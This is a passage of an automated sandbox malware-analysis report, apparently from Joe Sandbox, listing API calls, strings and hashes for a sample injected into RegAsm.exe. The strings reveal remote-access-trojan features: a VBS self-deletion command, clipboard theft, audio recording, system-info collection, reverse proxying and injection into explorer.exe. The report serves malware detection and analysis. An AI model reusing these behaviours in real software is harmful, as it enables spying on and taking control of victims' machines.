                                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                • API String ID: 1913171305-3159800282
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                APIs
                                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                                • GetFileType.KERNEL32 ref: 00455D82
                                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: \&G$\&G$`&G
                                                                                • API String ID: 269201875-253610517
                                                                                APIs
                                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                • String ID: 8SG$8SG$P>4$p54
                                                                                • API String ID: 3795512280-3795555813
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 65535$udp
                                                                                • API String ID: 0-1267037602
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                • _free.LIBCMT ref: 0043A9C3
                                                                                • _free.LIBCMT ref: 0043A9CA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                • String ID:
                                                                                • API String ID: 2441525078-0
                                                                                • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                • String ID: p54$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                • API String ID: 489098229-470385806
                                                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                • GetMessageA.USER32 ref: 0040556F
                                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                                • DispatchMessageA.USER32 ref: 00405589
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 2956720200-749203953
                                                                                • Opcode ID: c1c3b9fa3f2ec3db4d6b6b73e886c266241c202666a46fd1ccd2ca1fadaa2b5d
                                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                • Opcode Fuzzy Hash: c1c3b9fa3f2ec3db4d6b6b73e886c266241c202666a46fd1ccd2ca1fadaa2b5d
                                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                APIs
                                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                                • API String ID: 1704390241-2575729100
                                                                                • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                • GetClipboardData.USER32 ref: 004169A7
                                                                                • GlobalLock.KERNEL32 ref: 004169B0
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                • String ID: !D@
                                                                                • API String ID: 2172192267-604454484
                                                                                • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                APIs
                                                                                • _free.LIBCMT ref: 004481B5
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 004481C1
                                                                                • _free.LIBCMT ref: 004481CC
                                                                                • _free.LIBCMT ref: 004481D7
                                                                                • _free.LIBCMT ref: 004481E2
                                                                                • _free.LIBCMT ref: 004481ED
                                                                                • _free.LIBCMT ref: 004481F8
                                                                                • _free.LIBCMT ref: 00448203
                                                                                • _free.LIBCMT ref: 0044820E
                                                                                • _free.LIBCMT ref: 0044821C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                APIs
                                                                                • _free.LIBCMT ref: 100059EA
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 100059F6
                                                                                • _free.LIBCMT ref: 10005A01
                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                • _free.LIBCMT ref: 10005A17
                                                                                • _free.LIBCMT ref: 10005A22
                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                • _free.LIBCMT ref: 10005A38
                                                                                • _free.LIBCMT ref: 10005A43
                                                                                • _free.LIBCMT ref: 10005A51
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Eventinet_ntoa
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                • API String ID: 3578746661-3604713145
                                                                                • Opcode ID: d16bb5f8acb4f4edd706dea9c6aa242324435850ff4d97f1b554300b27c411f7
                                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                • Opcode Fuzzy Hash: d16bb5f8acb4f4edd706dea9c6aa242324435850ff4d97f1b554300b27c411f7
                                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                APIs
                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DecodePointer
                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                • API String ID: 3527080286-3064271455
                                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                • API String ID: 1462127192-2001430897
                                                                                • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentProcess
                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                • API String ID: 2050909247-4242073005
                                                                                • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                APIs
                                                                                • _strftime.LIBCMT ref: 00401D50
                                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                • API String ID: 3809562944-243156785
                                                                                • Opcode ID: c516264c44cb761782eec52892d0a1fed95260c95ae9b4565e1287bee73375bc
                                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                • Opcode Fuzzy Hash: c516264c44cb761782eec52892d0a1fed95260c95ae9b4565e1287bee73375bc
                                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                • int.LIBCPMT ref: 00410EBC
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                • String ID: ,kG$0kG
                                                                                • API String ID: 3815856325-2015055088
                                                                                • Opcode ID: 520139271163b524b0f3c27c15f9cb8b3411f5b4579fbd911df66d6a7deba011
                                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                • Opcode Fuzzy Hash: 520139271163b524b0f3c27c15f9cb8b3411f5b4579fbd911df66d6a7deba011
                                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                APIs
